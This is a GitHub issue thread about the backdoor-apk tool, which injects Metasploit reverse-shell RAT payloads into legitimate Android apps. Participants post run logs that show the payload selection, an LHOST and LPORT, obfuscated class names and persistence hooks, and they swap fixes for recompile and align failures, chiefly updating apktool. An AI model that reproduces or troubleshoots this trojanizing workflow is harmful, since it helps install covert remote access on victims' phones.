### ISSUE TITLE
Failed to recompile original project with backdoor

### ISSUE THREAD

**Issue by EliasHridoy** [dana-at-cp/backdoor-apk#157]
Backdoor-apk unable to recompile many apk like "Share it" , "MX Player" etc. I tried all the possible way but it is not generating apk fiel

**Comment by dana-at-cp** [comment]
@EliasHridoy Was the APK sourced from the Google Play Store?

**Comment by EliasHridoy** [comment]
No they are not from Google play store ? I downloaded them from a web site

**Comment by abdu1aziz** [comment]
I've got the same problem. I'm downloading the apk from multiple different sources and end up with same issue at the end. 
Everything seems to be going perfect until this step.
*[!] Failed to recompile original project with backdoor*

**Comment by jamesbow2** [comment]
I have been getting the same problem too. Apks downloaded are from Apkmirror.com, even after decompling and recompiling the Apks with Apktool. Are there any guidelines or list of Apks that the backdoor will compile with?

**Comment by zhangmax94** [comment]
the same issues happened to me  ,no other special errors but it

**Comment by dana-at-cp** [comment]
> I have been getting the same problem too. Apks downloaded are from Apkmirror.com, even after decompling and recompiling the Apks with Apktool. Are there any guidelines or list of Apks that the backdoor will compile with?

@jamesbow2  Are you stating that Apktool is able to decompile/recompile the APK but it somehow fails when used as part of backdoor-apk?

**Comment by dana-at-cp** [comment]
@EliasHridoy @abdu1aziz @jamesbow2 @zhangmax94 Have you tried the APK files that are in the third-party/APKs folder?

**Comment by jamesbow2** [comment]
> > I have been getting the same problem too. Apks downloaded are from Apkmirror.com, even after decompling and recompiling the Apks with Apktool. Are there any guidelines or list of Apks that the backdoor will compile with?
> 
> @jamesbow2 Are you stating that Apktool is able to decompile/recompile the APK but it somehow fails when used as part of backdoor-apk?

Yes, using Apktool to decompile and recompile is fine, but it fails when used with backdoor-apk. Have not tried the APKs folder, will do, thank you.

**Comment by EliasHridoy** [comment]
@dana-at-cp same result. I tried many  time. 

> root@kali:~/Desktop/backdoor-apk/backdoor-apk# ./backdoor-apk.sh third-party/APKs/Via.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Fri Nov  2 00:33:54 EDT 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.0.100
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: mark/via/gp
[+] Smali file to hook RAT payload: mark/via/ui/browser/BrowserApp.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: mark/via/gp/unqcm
[+] Generated new smali class name for MainBroadcastReceiver.smali: Aspmx
[+] Generated new smali class name for MainService.smali: Mpupf
[+] Generated new smali class name for Payload.smali: Eafqv
[+] Generated new smali class name for StringObfuscator.smali: Wcfwd
[+] Generated new smali method name for StringObfuscator.obfuscate method: tlfke
[+] Generated new smali method name for StringObfuscator.unobfuscate method: uwltz
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

**Comment by empt1xo** [comment]
same issue in here :/

**Comment by zhangmax94** [comment]
everything is ok ,the reason for  recompiling failed is that the apktool version installed through apt-get is not suitable. just download apktool and apktool.jar from its official website .

**Comment by stevanuscolonne** [comment]
@zhangmax94 many thanks for pointing towards the right direction.. For me the problem is apktool.jar, after replacing the apktool.jar recompiling success.

**Comment by EliasHridoy** [comment]
@zhangmax94 Can you please explain the things. How to replace apktool.jar . Because I already replace apktool.jar in /usr/share/apktool directory. But my problem is not solved yet

**Comment by FirstClickin** [comment]
🛑🛑 HERE IS THE **FIX** 2019 - https://youtu.be/QfyYWioLEk4
Full Video.

**Comment by dana-at-cp** [comment]
#168

**Comment by userRohit** [comment]
[!] Failed to recompile original project with backdoor
#face that problem 
i have apktool  version 2.3.4-dirty  
plz solve this problem

**Comment by justMSARahat** [comment]
hey.i have same problem.
But I notice That My linux Doesn't have installed lib32ncrses5.
And I am unable to install that,
when i type : apt-get install lib23ncrses5
the i found this: e unable to locate this package.
and this is the main problem of that.
if anyone can solve that problem???

**Comment by jacobrohit** [comment]
/ ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Tue 10 Dec 2019 09:03:59 PM IST
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/cdroid/dominoes
[+] Smali file to hook RAT payload: com/cdroid/dominoes/DominoContext.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/cdroid/dominoes/gexam
[+] Generated new smali class name for MainBroadcastReceiver.smali: Tigvn
[+] Generated new smali class name for MainService.smali: Ounec
[+] Generated new smali class name for Payload.smali: Ocgme
[+] Generated new smali class name for StringObfuscator.smali: Bahlg
[+] Generated new smali method name for StringObfuscator.obfuscate method: upjxo
[+] Generated new smali method name for StringObfuscator.unobfuscate method: ncbce
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
date: invalid date ‘Sat Sep 26 20:51:24 2511’
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[!] Failed to align recompiled APK

**Comment by jacobrohit** [comment]
/ ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Tue 10 Dec 2019 09:03:59 PM IST
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/cdroid/dominoes
[+] Smali file to hook RAT payload: com/cdroid/dominoes/DominoContext.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/cdroid/dominoes/gexam
[+] Generated new smali class name for MainBroadcastReceiver.smali: Tigvn
[+] Generated new smali class name for MainService.smali: Ounec
[+] Generated new smali class name for Payload.smali: Ocgme
[+] Generated new smali class name for StringObfuscator.smali: Bahlg
[+] Generated new smali method name for StringObfuscator.obfuscate method: upjxo
[+] Generated new smali method name for StringObfuscator.unobfuscate method: ncbce
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
**date: invalid date ‘Sat Sep 26 20:51:24 2511’**
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
**[!] Failed to align recompiled APK**

**Comment by jacobrohit** [comment]
/ ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Tue 10 Dec 2019 09:03:59 PM IST
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/cdroid/dominoes
[+] Smali file to hook RAT payload: com/cdroid/dominoes/DominoContext.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/cdroid/dominoes/gexam
[+] Generated new smali class name for MainBroadcastReceiver.smali: Tigvn
[+] Generated new smali class name for MainService.smali: Ounec
[+] Generated new smali class name for Payload.smali: Ocgme
[+] Generated new smali class name for StringObfuscator.smali: Bahlg
[+] Generated new smali method name for StringObfuscator.obfuscate method: upjxo
[+] Generated new smali method name for StringObfuscator.unobfuscate method: ncbce
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
**date: invalid date ‘Sat Sep 26 20:51:24 2511’**
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
**[!] Failed to align recompiled APK**

**Comment by JulioVictor242004** [comment]
Eu tô com o mesmo problema 😔

**Comment by heyanghyq** [comment]
Download the [latest version](https://bitbucket.org/iBotPeaches/apktool/downloads) of Apktool.
